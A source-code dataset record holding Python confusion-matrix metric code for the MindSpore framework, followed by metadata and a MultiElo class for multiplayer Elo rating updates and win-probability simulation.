numerator = np.sqrt(ppv * tpr)
denominator = 1.0
return numerator, denominator
def _calculate_bm(tp, tn, p, n):
"""Calculate bm."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = tpr + tnr - 1.0
denominator = 1.0
return numerator, denominator
def _calculate_mk(tp, fp, tn, fn):
"""Calculate mk."""
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
npv = np.where((tn + fn) > 0, tn / (tn + fn), np.array(float("nan")))
npv = tn / (tn + fn)
numerator = ppv + npv - 1.0
denominator = 1.0
return numerator, denominator
def _compute_confusion_matrix_metric(metric_name, confusion_matrix):
    """
    Compute one confusion-matrix-derived metric.

    Args:
        metric_name (str): Metric name or alias; normalized via _check_metric_name.
        confusion_matrix (ndarray): Array whose last dimension holds
            [TP, FP, TN, FN] (see '_get_confusion_matrix').

    Returns:
        ndarray, the metric values, NaN where the denominator is zero.

    Raises:
        ValueError: when the size of the last dimension of confusion_matrix is not 4.
        NotImplementedError: when specify a not implemented metric_name.
    """
    metric = _check_metric_name(metric_name)
    input_dim = confusion_matrix.ndim
    if input_dim == 1:
        confusion_matrix = np.expand_dims(confusion_matrix, 0)
    if confusion_matrix.shape[-1] != 4:
        raise ValueError("The size of the last dimension of confusion_matrix should be 4.")
    tp = confusion_matrix[..., 0]
    fp = confusion_matrix[..., 1]
    tn = confusion_matrix[..., 2]
    fn = confusion_matrix[..., 3]
    p = tp + fn
    n = fp + tn
    # Dispatch table of (calculator, args); only the selected metric runs.
    # The previous version called every calculator eagerly when building the
    # dict, wasting work and emitting spurious divide warnings for metrics
    # that were never requested.
    metric_name_dict = {"tpr": (_calculate_tpr, (tp, p)),
                        "tnr": (_calculate_tnr, (tn, n)),
                        "ppv": (_calculate_ppv, (tp, fp)),
                        "npv": (_calculate_npv, (tn, fn)),
                        "fnr": (_calculate_fnr, (fn, p)),
                        "fpr": (_calculate_fpr, (fp, n)),
                        "fdr": (_calculate_fdr, (tp, fp)),
                        "for": (_calculate_for, (tn, fn)),
                        "pt": (_calculate_pt, (tp, tn, p, n)),
                        "ts": (_calculate_ts, (tp, fp, fn)),
                        "acc": (_calculate_acc, (tp, tn, p, n)),
                        "ba": (_calculate_ba, (tp, tn, p, n)),
                        "f1": (_calculate_f1, (tp, fp, fn)),
                        "mcc": (_calculate_mcc, (tp, fp, tn, fn)),
                        "fm": (_calculate_fm, (tp, fp, p)),
                        "bm": (_calculate_bm, (tp, tn, p, n)),
                        "mk": (_calculate_mk, (tp, fp, tn, fn))
                        }
    calculator, args = metric_name_dict.get(metric)
    numerator, denominator = calculator(*args)
    if isinstance(denominator, np.ndarray):
        result = np.where(denominator != 0, numerator / denominator, np.array(float("nan")))
    else:
        result = numerator / denominator
    return result
def _check_metric_name(metric_name):
"""
There are many metrics related to confusion matrix, and some of the metrics have more than one names. In addition,
some of the names are very long. Therefore, this function is used to check and simplify the name.
Returns:
Simplified metric name.
Raises:
NotImplementedError: when the metric is not implemented.
"""
metric_name = metric_name.replace(" ", "_")
metric_name = metric_name.lower()
metric_name_dict = {"sensitivity": "tpr",
"recall": "tpr",
"hit_rate": "tpr",
"true_positive_rate": "tpr",
"tpr": "tpr",
"specificity": "tnr",
"selectivity": "tnr",
"true_negative_rate": "tnr",
"tnr": "tnr",
"precision": "ppv",
"positive_predictive_value": "ppv",
"ppv": "ppv",
"negative_predictive_value": "npv",
"npv": "npv",
"miss_rate": "fnr",
"false_negative_rate": "fnr",
"fnr": "fnr",
"fall_out": "fpr",
"false_positive_rate": "fpr",
"fpr": "fpr",
"false_discovery_rate": "fdr",
"fdr": "fdr",
"false_omission_rate": "for",
"for": "for",
"prevalence_threshold": "pt",
"pt": "pt",
"threat_score": "ts",
"critical_success_index": "ts",
"ts": "ts",
"csi": "ts",
"accuracy": "acc",
"acc": "acc",
"balanced_accuracy": "ba",
"ba": "ba",
"f1_score": "f1",
"f1": "f1",
"matthews_correlation_coefficient": "mcc",
"mcc": "mcc",
"fowlkes_mallows_index": "fm",
"fm": "fm",
"informedness": "bm",
"bookmaker_informedness": "bm",
"bm": "bm",
"markedness": "mk",
"deltap": "mk",
"mk": "mk"
}
metric_name_info = metric_name_dict.get(metric_name)
if metric_name_info is None:
raise NotImplementedError("The metric is not implemented.")
return metric_name_info
| 39.739067
| 120
| 0.583874
|
import numpy as np
from mindspore._checkparam import Validator as validator
from .metric import Metric
class ConfusionMatrix(Metric):
    """Accumulates a num_classes x num_classes confusion matrix over updates.

    normalize is one of 'no_norm', 'target' (row-wise), 'prediction'
    (column-wise) or 'all' (whole matrix); threshold binarizes
    floating-point predictions.
    """
    TARGET = "target"
    PREDICTION = "prediction"
    ALL = "all"
    NO_NORM = "no_norm"
    def __init__(self, num_classes, normalize=NO_NORM, threshold=0.5):
        super(ConfusionMatrix, self).__init__()
        self.num_classes = validator.check_value_type("num_classes", num_classes, [int])
        # NOTE(review): `is not` identity-compares strings here and works only
        # by interning; a `!=` / membership test would be safer — confirm.
        if normalize != ConfusionMatrix.TARGET and normalize != ConfusionMatrix.PREDICTION and \
                normalize != ConfusionMatrix.ALL and normalize is not ConfusionMatrix.NO_NORM:
            raise ValueError(
                'The normalize way should be in [all, prediction, label, None], but got {}.'.format(normalize)
            )
        self.normalize = normalize
        self.threshold = validator.check_value_type("threshold", threshold, [float])
        self.clear()
    def clear(self):
        """Clears the internal evaluation result."""
        self.confusion_matrix = np.zeros((self.num_classes, self.num_classes))
        self._is_update = False
    def update(self, *inputs):
        """Update state with (y_pred, y); raises ValueError unless exactly two inputs."""
        if len(inputs) != 2:
            raise ValueError('ConfusionMatrix need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
        y_pred = self._convert_data(inputs[0])
        y = self._convert_data(inputs[1])
        if not (y_pred.ndim == y.ndim or y_pred.ndim == y.ndim + 1):
            raise ValueError("y_pred and y should have the same number of dimensions, or the dimension of y_pred "
                             "equals the dimension of y add 1.")
        # Extra class axis (logits/probabilities): collapse via argmax.
        if y_pred.ndim == y.ndim + 1:
            y_pred = np.argmax(y_pred, axis=1)
        # Floating-point scores at the same rank as y: binarize by threshold.
        if y_pred.ndim == y.ndim and y_pred.dtype in (np.float16, np.float32, np.float64):
            y_pred = (y_pred >= self.threshold).astype(int)
        # Encode each (true, pred) pair as one index and histogram them.
        trans = (y.reshape(-1) * self.num_classes + y_pred.reshape(-1)).astype(int)
        bincount = np.bincount(trans, minlength=self.num_classes ** 2)
        confusion_matrix = bincount.reshape(self.num_classes, self.num_classes)
        self.confusion_matrix += confusion_matrix
        self._is_update = True
    def eval(self):
        """Return the (optionally normalized) accumulated confusion matrix."""
        if not self._is_update:
            raise RuntimeError('Call the update method before calling eval.')
        confusion_matrix = self.confusion_matrix.astype(float)
        matrix_target = confusion_matrix / confusion_matrix.sum(axis=1, keepdims=True)
        matrix_pred = confusion_matrix / confusion_matrix.sum(axis=0, keepdims=True)
        matrix_all = confusion_matrix / confusion_matrix.sum()
        normalize_dict = {ConfusionMatrix.TARGET: matrix_target,
                          ConfusionMatrix.PREDICTION: matrix_pred,
                          ConfusionMatrix.ALL: matrix_all}
        if self.normalize == ConfusionMatrix.NO_NORM:
            return confusion_matrix
        matrix = normalize_dict.get(self.normalize)
        # Zero-sum rows/columns divide to NaN; report those cells as 0.
        if matrix[np.isnan(matrix)].size != 0:
            matrix[np.isnan(matrix)] = 0
        return matrix
class ConfusionMatrixMetric(Metric):
    """Confusion-matrix-derived metric (e.g. sensitivity, specificity, f1).

    With calculation_method=True, per-sample scores are averaged across
    updates; otherwise raw TP/FP/TN/FN counts are accumulated globally and
    the metric is computed once in eval().
    """
    def __init__(self,
                 skip_channel=True,
                 metric_name="sensitivity",
                 calculation_method=False,
                 decrease="mean"):
        super(ConfusionMatrixMetric, self).__init__()
        self.confusion_matrix = _ConfusionMatrix(skip_channel=skip_channel, metric_name=metric_name,
                                                 calculation_method=calculation_method, decrease=decrease)
        self.skip_channel = validator.check_value_type("skip_channel", skip_channel, [bool])
        self.calculation_method = validator.check_value_type("calculation_method", calculation_method, [bool])
        self.metric_name = validator.check_value_type("metric_name", metric_name, [str])
        decrease_list = ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"]
        decrease = validator.check_value_type("decrease", decrease, [str])
        self.decrease = validator.check_string(decrease, decrease_list, "decrease")
        self.clear()
    def clear(self):
        """Clears the internal evaluation result."""
        self._total_num = 0
        self._class_num = 0
        self._total_tp = 0.0
        self._total_fp = 0.0
        self._total_tn = 0.0
        self._total_fn = 0.0
    def update(self, *inputs):
        """Accumulate one batch of (y_pred, y); raises ValueError unless exactly two inputs."""
        if len(inputs) != 2:
            raise ValueError('ConfusionMatrixMetric need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
        y_pred = self._convert_data(inputs[0])
        y = self._convert_data(inputs[1])
        if self.calculation_method is True:
            # Per-sample path: weighted running mean over valid (non-NaN) entries.
            score, not_nans = self.confusion_matrix(y_pred, y)
            not_nans = int(not_nans.item())
            self._total_num += score.item() * not_nans
            self._class_num += not_nans
        else:
            # Global path: fold this batch's TP/FP/TN/FN into the running totals.
            confusion_matrix = self.confusion_matrix(y_pred, y)
            confusion_matrix, _ = _decrease_metric(confusion_matrix, "sum")
            self._total_tp += confusion_matrix[0].item()
            self._total_fp += confusion_matrix[1].item()
            self._total_tn += confusion_matrix[2].item()
            self._total_fn += confusion_matrix[3].item()
    def eval(self):
        """Compute the configured metric from the accumulated state."""
        if self.calculation_method is True:
            if self._class_num == 0:
                raise RuntimeError("ConfusionMatrixMetric must have at least one example before it can be computed.")
            return self._total_num / self._class_num
        confusion_matrix = np.array([self._total_tp, self._total_fp, self._total_tn, self._total_fn])
        return _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
class _ConfusionMatrix:
    """Callable helper computing the confusion matrix (or a reduced metric) for a batch.

    If calculation_method is True, __call__ returns the reduced metric
    (or list of metrics); otherwise it returns the raw [B, C, 4] counts.
    """
    def __init__(self, skip_channel=True, metric_name="hit_rate", calculation_method=False,
                 decrease="mean"):
        super().__init__()
        self.skip_channel = skip_channel
        self.metric_name = metric_name
        self.calculation_method = calculation_method
        self.decrease = decrease
    def __call__(self, y_pred, y):
        """Compute for one batch; y must be binarized, y_pred at least 2-D."""
        if not np.all(y.astype(np.uint8) == y):
            raise ValueError("y should be a binarized ndarray.")
        dims = y_pred.ndim
        if dims < 2:
            raise ValueError("y_pred should have at least two dimensions.")
        # NOTE(review): for 2-D ([B, N]) or trivially 3-D ([B, N, 1]) input
        # the per-sample path is permanently disabled on this instance — a
        # lasting side effect. Confirm this is intended.
        if dims == 2 or (dims == 3 and y_pred.shape[-1] == 1):
            if self.calculation_method:
                self.calculation_method = False
        confusion_matrix = _get_confusion_matrix(y_pred=y_pred, y=y, skip_channel=self.skip_channel)
        if self.calculation_method:
            if isinstance(self.metric_name, str):
                confusion_matrix = _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
                chart, not_nans = _decrease_metric(confusion_matrix, self.decrease)
                return chart, not_nans
            if not self.metric_name:
                raise ValueError("There should be at least one metric name.")
            results = []
            # A sequence of names yields [chart_0, not_nans_0, chart_1, ...].
            for metric_name in self.metric_name:
                sub_confusion_matrix = _compute_confusion_matrix_metric(metric_name, confusion_matrix)
                chart, not_nans = _decrease_metric(sub_confusion_matrix, self.decrease)
                results.append(chart)
                results.append(not_nans)
            return results
        return confusion_matrix
def _get_confusion_matrix(y_pred, y, skip_channel=True):
    """Build a per-sample, per-class confusion matrix stack.

    Returns an array of shape ``(batch, n_class, 4)`` whose last axis is
    ``[tp, fp, tn, fn]``, counted over all remaining (flattened) elements.
    Both inputs must have identical shapes and ``y`` must be binarized.

    NOTE(review): when ``skip_channel`` is False the *first* channel is
    dropped (background removal?); the parameter name suggests the opposite
    polarity — confirm against the caller's intent.
    """
    if not skip_channel:
        y = y[:, 1:] if y.shape[1] > 1 else y
        y_pred = y_pred[:, 1:] if y_pred.shape[1] > 1 else y_pred
    y = y.astype(float)
    y_pred = y_pred.astype(float)
    # Project-level validator: enforces y.shape == y_pred.shape.
    validator.check('y_shape', y.shape, 'y_pred_shape', y_pred.shape)
    batch_size, n_class = y_pred.shape[:2]
    # Flatten all trailing spatial axes so counting is a single sum.
    y_pred = y_pred.reshape(batch_size, n_class, -1)
    y = y.reshape(batch_size, n_class, -1)
    # With binarized inputs: sum==2 -> both positive (TP); sum==0 -> both negative (TN).
    tp = ((y_pred + y) == 2).astype(float)
    tn = ((y_pred + y) == 0).astype(float)
    tp = tp.sum(axis=2)
    tn = tn.sum(axis=2)
    p = y.sum(axis=2)
    n = y.shape[-1] - p
    fn = p - tp
    fp = n - tn
    return np.stack([tp, fp, tn, fn], axis=-1)
def _decrease_mean(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
not_nans = (not_nans > 0).astype(float).sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum(not_nans, chart):
not_nans = not_nans.sum(axis=(0, 1))
chart = np.sum(chart, axis=(0, 1))
return not_nans, chart
def _decrease_mean_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = chart.sum(axis=0)
return not_nans, chart
def _decrease_mean_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = chart.sum(axis=1)
return not_nans, chart
def _decrease_none(not_nans, chart):
return not_nans, chart
def _decrease_metric(chart, decrease="mean"):
    """Zero out NaNs in ``chart`` (in place) and apply the requested reduction.

    :param chart: metric values; NaN marks invalid entries. Mutated in place
        (NaNs replaced by 0) before reduction, matching original behavior.
    :param decrease: one of "mean", "sum", "mean_batch", "sum_batch",
        "mean_channel", "sum_channel", "none".
    :return: ``(reduced_chart, not_nans)`` — note the order is swapped
        relative to the individual reducers, which return ``(not_nans, chart)``.
    :raises ValueError: for an unknown ``decrease`` mode.

    Bug fixed: the original built the dispatch dict by *calling* most
    reducers eagerly (computing all reductions on every call) while leaving
    the "mean_batch" entry as an uncalled function, so ``decrease="mean_batch"``
    crashed when unpacking. The dict now stores callables and only the
    selected one runs.
    """
    nans = np.isnan(chart)
    not_nans = (~nans).astype(float)
    chart[nans] = 0
    decrease_dict = {"mean": _decrease_mean,
                     "sum": _decrease_sum,
                     "mean_batch": _decrease_mean_batch,
                     "sum_batch": _decrease_sum_batch,
                     "mean_channel": _decrease_mean_channel,
                     "sum_channel": _decrease_sum_channel,
                     "none": _decrease_none}
    reducer = decrease_dict.get(decrease)
    if reducer is None:
        # Original code crashed with an opaque TypeError here; fail clearly.
        raise ValueError("Unsupported decrease mode: {}".format(decrease))
    not_nans, chart = reducer(not_nans, chart)
    return chart, not_nans
def _calculate_tpr(tp, p):
return tp, p
def _calculate_tnr(tn, n):
return tn, n
def _calculate_ppv(tp, fp):
return tp, (tp + fp)
def _calculate_npv(tn, fn):
return tn, (tn + fn)
def _calculate_fnr(fn, p):
return fn, p
def _calculate_fpr(fp, n):
return fp, n
def _calculate_fdr(tp, fp):
return fp, (fp + tp)
def _calculate_for(tn, fn):
return fn, (fn + tn)
def _calculate_pt(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = np.sqrt(tpr * (1.0 - tnr)) + tnr - 1.0
denominator = tpr + tnr - 1.0
return numerator, denominator
def _calculate_ts(tp, fp, fn):
return tp, (tp + fn + fp)
def _calculate_acc(tp, tn, p, n):
return (tp + tn), (p + n)
def _calculate_ba(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator, denominator = (tpr + tnr), 2.0
return numerator, denominator
def _calculate_f1(tp, fp, fn):
return tp * 2.0, (tp * 2.0 + fn + fp)
def _calculate_mcc(tp, fp, tn, fn):
numerator = tp * tn - fp * fn
denominator = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return numerator, denominator
def _calculate_fm(tp, fp, p):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
numerator = np.sqrt(ppv * tpr)
denominator = 1.0
return numerator, denominator
def _calculate_bm(tp, tn, p, n):
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = tpr + tnr - 1.0
denominator = 1.0
return numerator, denominator
def _calculate_mk(tp, fp, tn, fn):
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
npv = np.where((tn + fn) > 0, tn / (tn + fn), np.array(float("nan")))
npv = tn / (tn + fn)
numerator = ppv + npv - 1.0
denominator = 1.0
return numerator, denominator
def _compute_confusion_matrix_metric(metric_name, confusion_matrix):
    """Compute one named metric from a ``[..., 4]`` confusion-matrix stack.

    :param metric_name: any alias accepted by ``_check_metric_name``.
    :param confusion_matrix: array whose last axis is ``[tp, fp, tn, fn]``;
        a 1-D input is treated as a single row.
    :return: elementwise metric values; entries with a zero denominator
        become NaN.
    :raises ValueError: if the last dimension is not 4.

    Performance fix: the original built the dispatch dict by *calling* all
    17 ``_calculate_*`` helpers on every invocation, computing 16 unused
    metrics (and triggering spurious divide warnings). Dispatch is now lazy —
    only the requested metric is evaluated.
    """
    metric = _check_metric_name(metric_name)
    input_dim = confusion_matrix.ndim
    if input_dim == 1:
        confusion_matrix = np.expand_dims(confusion_matrix, 0)
    if confusion_matrix.shape[-1] != 4:
        raise ValueError("The size of the last dimension of confusion_matrix should be 4.")
    tp = confusion_matrix[..., 0]
    fp = confusion_matrix[..., 1]
    tn = confusion_matrix[..., 2]
    fn = confusion_matrix[..., 3]
    p = tp + fn
    n = fp + tn
    metric_name_dict = {"tpr": lambda: _calculate_tpr(tp, p),
                        "tnr": lambda: _calculate_tnr(tn, n),
                        "ppv": lambda: _calculate_ppv(tp, fp),
                        "npv": lambda: _calculate_npv(tn, fn),
                        "fnr": lambda: _calculate_fnr(fn, p),
                        "fpr": lambda: _calculate_fpr(fp, n),
                        "fdr": lambda: _calculate_fdr(tp, fp),
                        "for": lambda: _calculate_for(tn, fn),
                        "pt": lambda: _calculate_pt(tp, tn, p, n),
                        "ts": lambda: _calculate_ts(tp, fp, fn),
                        "acc": lambda: _calculate_acc(tp, tn, p, n),
                        "ba": lambda: _calculate_ba(tp, tn, p, n),
                        "f1": lambda: _calculate_f1(tp, fp, fn),
                        "mcc": lambda: _calculate_mcc(tp, fp, tn, fn),
                        "fm": lambda: _calculate_fm(tp, fp, p),
                        "bm": lambda: _calculate_bm(tp, tn, p, n),
                        "mk": lambda: _calculate_mk(tp, fp, tn, fn)
                        }
    numerator, denominator = metric_name_dict.get(metric)()
    if isinstance(denominator, np.ndarray):
        # Elementwise division with NaN for undefined (zero-denominator) entries.
        result = np.where(denominator != 0, numerator / denominator, np.array(float("nan")))
    else:
        result = numerator / denominator
    return result
def _check_metric_name(metric_name):
metric_name = metric_name.replace(" ", "_")
metric_name = metric_name.lower()
metric_name_dict = {"sensitivity": "tpr",
"recall": "tpr",
"hit_rate": "tpr",
"true_positive_rate": "tpr",
"tpr": "tpr",
"specificity": "tnr",
"selectivity": "tnr",
"true_negative_rate": "tnr",
"tnr": "tnr",
"precision": "ppv",
"positive_predictive_value": "ppv",
"ppv": "ppv",
"negative_predictive_value": "npv",
"npv": "npv",
"miss_rate": "fnr",
"false_negative_rate": "fnr",
"fnr": "fnr",
"fall_out": "fpr",
"false_positive_rate": "fpr",
"fpr": "fpr",
"false_discovery_rate": "fdr",
"fdr": "fdr",
"false_omission_rate": "for",
"for": "for",
"prevalence_threshold": "pt",
"pt": "pt",
"threat_score": "ts",
"critical_success_index": "ts",
"ts": "ts",
"csi": "ts",
"accuracy": "acc",
"acc": "acc",
"balanced_accuracy": "ba",
"ba": "ba",
"f1_score": "f1",
"f1": "f1",
"matthews_correlation_coefficient": "mcc",
"mcc": "mcc",
"fowlkes_mallows_index": "fm",
"fm": "fm",
"informedness": "bm",
"bookmaker_informedness": "bm",
"bm": "bm",
"markedness": "mk",
"deltap": "mk",
"mk": "mk"
}
metric_name_info = metric_name_dict.get(metric_name)
if metric_name_info is None:
raise NotImplementedError("The metric is not implemented.")
return metric_name_info
| true
| true
|
f7059c170fbd2ef4ccd70edeaa67879926e52cb0
| 11,928
|
py
|
Python
|
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
multiBatelo/multielo.py
|
Balavignesh/badminton-elo-dashboard
|
df380afb26c89827111f7316df381408d7d19298
|
[
"MIT"
] | null | null | null |
import numpy as np
from typing import Union, List, Callable
import logging
from multiBatelo.score_functions import create_exponential_score_function
# Default K-factor: scales how much ratings move after each matchup.
DEFAULT_K_VALUE = 32
# Default D-value: rating gap scale in the win-probability logistic
# (classic Elo uses 400).
DEFAULT_D_VALUE = 400
# Base for the exponential score function; 1 yields a linear score curve.
DEFAULT_SCORING_FUNCTION_BASE = 1
# Module-level fallback logger used when the caller does not supply one.
_default_logger = logging.getLogger("multielo.multielo")
class MultiElo:
    """
    Generalized Elo for multiplayer matchups (simplifies to standard Elo for
    1-vs-1 matchups). Ties are supported by passing repeated places in
    ``result_order`` (the original class docstring claimed otherwise, but
    ``get_actual_scores`` explicitly averages tied players' scores).
    """

    def __init__(
        self,
        k_value: float = DEFAULT_K_VALUE,
        d_value: float = DEFAULT_D_VALUE,
        score_function_base: float = DEFAULT_SCORING_FUNCTION_BASE,
        custom_score_function: Callable = None,
        log_base: int = 10,
        logger: logging.Logger = None,
    ):
        """
        :param k_value: K parameter in Elo algorithm that determines how much ratings increase or decrease
        after each match
        :param d_value: D parameter in Elo algorithm that determines how much Elo difference affects win
        probability
        :param score_function_base: base value to use for scoring function; scores are approximately
        multiplied by this value as you improve from one place to the next (minimum allowed value is 1,
        which results in a linear scoring function)
        :param custom_score_function: a function that takes an integer input and returns a numpy array
        of monotonically decreasing values summing to 1
        :param log_base: base to use for logarithms throughout the Elo algorithm. Traditionally Elo
        uses base-10 logs
        :param logger: logger to use (optional)
        """
        self.k = k_value
        self.d = d_value
        self._score_func = custom_score_function or create_exponential_score_function(base=score_function_base)
        self._log_base = log_base
        self.logger = logger or _default_logger

    def get_new_ratings(
        self,
        initial_ratings: Union[List[float], np.ndarray],
        result_order: List[int] = None,
    ) -> np.ndarray:
        """
        Update ratings based on results. Takes an array of ratings before the matchup and returns an array with
        the updated ratings. Provided array should be ordered by the actual results (first place finisher's
        initial rating first, second place next, and so on).

        Example usage:
        >>> elo = MultiElo()
        >>> elo.get_new_ratings([1200, 1000])
        array([1207.68809835,  992.31190165])
        >>> elo.get_new_ratings([1200, 1000, 1100, 900])
        array([1212.01868209, 1012.15595083, 1087.84404917,  887.98131791])

        :param initial_ratings: array of ratings (float values) in order of actual results
        :param result_order: list where each value indicates the place the player in the same index of
        initial_ratings finished in. Lower is better. Identify ties by entering the same value for players
        that tied. For example, [1, 2, 3] indicates that the first listed player won, the second listed player
        finished 2nd, and the third listed player finished 3rd. [1, 2, 2] would indicate that the second
        and third players tied for 2nd place. (default = range(len(initial_ratings))
        :return: array of updated ratings (float values) in same order as input
        """
        if not isinstance(initial_ratings, np.ndarray):
            initial_ratings = np.array(initial_ratings)
        n = len(initial_ratings)  # number of players
        actual_scores = self.get_actual_scores(n, result_order)
        expected_scores = self.get_expected_scores(initial_ratings)
        scale_factor = self.k * (n - 1)
        self.logger.debug("scale factor: %s", scale_factor)
        return initial_ratings + scale_factor * (actual_scores - expected_scores)

    def get_actual_scores(self, n: int, result_order: List[int] = None) -> np.ndarray:
        """
        Return the scores to be awarded to the players based on the results.

        :param n: number of players in the matchup
        :param result_order: list indicating order of finish (see docstring for MultiElo.get_new_ratings
        for more details
        :return: array of length n of scores to be assigned to first place, second place, and so on
        """
        # calculate actual scores according to score function, then sort in order of finish
        result_order = result_order or list(range(n))
        scores = self._score_func(n)
        scores = scores[np.argsort(np.argsort(result_order))]

        # if there are ties, average the scores of all tied players
        distinct_results = set(result_order)
        if len(distinct_results) != n:
            for place in distinct_results:
                idx = [i for i, x in enumerate(result_order) if x == place]
                scores[idx] = scores[idx].mean()

        self._validate_actual_scores(scores, result_order)
        self.logger.debug("calculated actual scores: %s", scores)
        return scores

    @staticmethod
    def _validate_actual_scores(scores: np.ndarray, result_order: List[int]):
        """Sanity-check the score vector: sums to 1, min 0 (unless tied for
        last), and monotonically decreasing in order of finish."""
        if not np.allclose(1, sum(scores)):
            raise ValueError("scoring function does not return scores summing to 1")
        if min(scores) != 0:
            # tie for last place means minimum score doesn't have to be zero,
            # so only raise error if there isn't a tie for last place
            last_place = max(result_order)
            if result_order.count(last_place) == 1:
                raise ValueError("scoring function does not return minimum value of 0")
        if not np.all(np.diff(scores[np.argsort(result_order)]) <= 0):
            raise ValueError("scoring function does not return monotonically decreasing values")

    def get_expected_scores(self, ratings: Union[List[float], np.ndarray]) -> np.ndarray:
        """
        Get the expected scores for all players given their ratings before the matchup.

        :param ratings: array of ratings for each player in a matchup
        :return: array of expected scores for all players
        """
        if not isinstance(ratings, np.ndarray):
            ratings = np.array(ratings)
        if ratings.ndim > 1:
            raise ValueError(f"ratings should be 1-dimensional array (received {ratings.ndim})")

        # get all pairwise differences
        diff_mx = ratings - ratings[:, np.newaxis]
        # Bug fixed: this was a stray `print(...)` left in production code
        # while self.logger went unused; route debug output through the logger.
        self.logger.debug("diff_mx = \n%s", diff_mx)

        # get individual contributions to expected score using logistic function
        logistic_mx = 1 / (1 + self._log_base ** (diff_mx / self.d))
        np.fill_diagonal(logistic_mx, 0)

        # get each expected score (sum individual contributions, then scale)
        expected_scores = logistic_mx.sum(axis=1)
        n = len(ratings)
        denom = n * (n - 1) / 2  # number of individual head-to-head matchups between n players
        expected_scores = expected_scores / denom

        # this should be guaranteed, but check to make sure
        if not np.allclose(1, sum(expected_scores)):
            raise ValueError("expected scores do not sum to 1")
        self.logger.debug("calculated expected scores: %s", expected_scores)
        return expected_scores

    def simulate_win_probabilities(
        self,
        ratings: Union[List[float], np.ndarray],
        n_sim: int = int(1e5),
        seed: int = None,
    ) -> np.ndarray:
        """
        Estimate the probability of each player finishing in each possible
        place using a simulation. Returns a matrix where (i, j) values are the
        probability that player i finishes in place j.

        Each simulated game samples a score per player from a
        Gumbel(rating, D) distribution and ranks players by descending score.
        This works because Gumbel(a_1, b) - Gumbel(a_2, b) ~ Logistic(a_1 - a_2, b),
        the same distribution that gives pairwise Elo win probability, so a
        Gumbel score comparison reproduces the 1-on-1 win odds.

        :param ratings: array of ratings of the players involved
        :param n_sim: number of simulations to run
        :param seed: (optional) seed for random number generation
        :return: matrix (a numpy array) where (i, j) values are the probability
        that player i finishes in place j
        """
        if seed is not None:
            np.random.seed(seed)

        # sort so we always get the same result for same distinct ratings, but
        # keep track of original order
        idx = np.argsort(ratings)
        ratings = sorted(ratings)

        # simulate n_sim scores for each player from Gumbel distributions
        n_players = len(ratings)
        n_sim = int(n_sim)
        scores = np.zeros((n_players, n_sim))
        for i, rating in enumerate(ratings):
            scores[idx[i], :] = _gumbel_sample(
                loc=rating,
                scale=self.d,
                size=n_sim,
                base=self._log_base
            )
            self.logger.debug("finished sampling scores for player %d of %d", i + 1, n_players)

        # use the scores to decide the order of finish (highest score wins) and
        # create matrix with proportion of times each player finishes in each place
        result_mx = self._convert_scores_to_result_proportions(scores)
        self.logger.debug("finished simulation")
        return result_mx

    @staticmethod
    def _convert_scores_to_result_proportions(scores: np.ndarray) -> np.ndarray:
        """
        Take an array of scores with one row per player and one column per
        simulation, and return a matrix with one row per player and one column
        per place. Each (row, col) value in the returned matrix is the
        proportion of times player "row" finished in place "col".
        """
        # sort scores from high to low for each simulation
        results = np.argsort(-scores, axis=0)

        # put it into a matrix where row = player, column = place, value = count
        # of times player finished in place
        n = scores.shape[0]
        count_mx = np.zeros((n, n))
        for i, x in enumerate(results):
            counts = np.bincount(x, minlength=n)
            count_mx[:, i] = counts
        proportion_mx = count_mx / scores.shape[1]
        return proportion_mx
def _gumbel_sample(
loc: float,
scale: float,
size: int = 1,
base: float = np.exp(1),
) -> np.ndarray:
"""
Sample from a Gumbel distribution (optionally with a different log base).
:param loc: location parameter for distribution
:param scale: scale parameter for distribution (> 0)
:param size: number of samples to draw
:param base: base for logarithm (defaults to natural log)
:return: sample(s) from Gumbel distribution
"""
if scale <= 0:
raise ValueError("scale parameter for Gumbel distribution must be > 0")
p = np.random.rand(int(size))
return loc - scale * _log(-_log(p, base=base), base=base)
def _log(x, base=np.exp(1)):
return np.log(x) / np.log(base)
| 44.674157
| 111
| 0.655349
|
import numpy as np
from typing import Union, List, Callable
import logging
from multiBatelo.score_functions import create_exponential_score_function
DEFAULT_K_VALUE = 32
DEFAULT_D_VALUE = 400
DEFAULT_SCORING_FUNCTION_BASE = 1
_default_logger = logging.getLogger("multielo.multielo")
class MultiElo:
def __init__(
self,
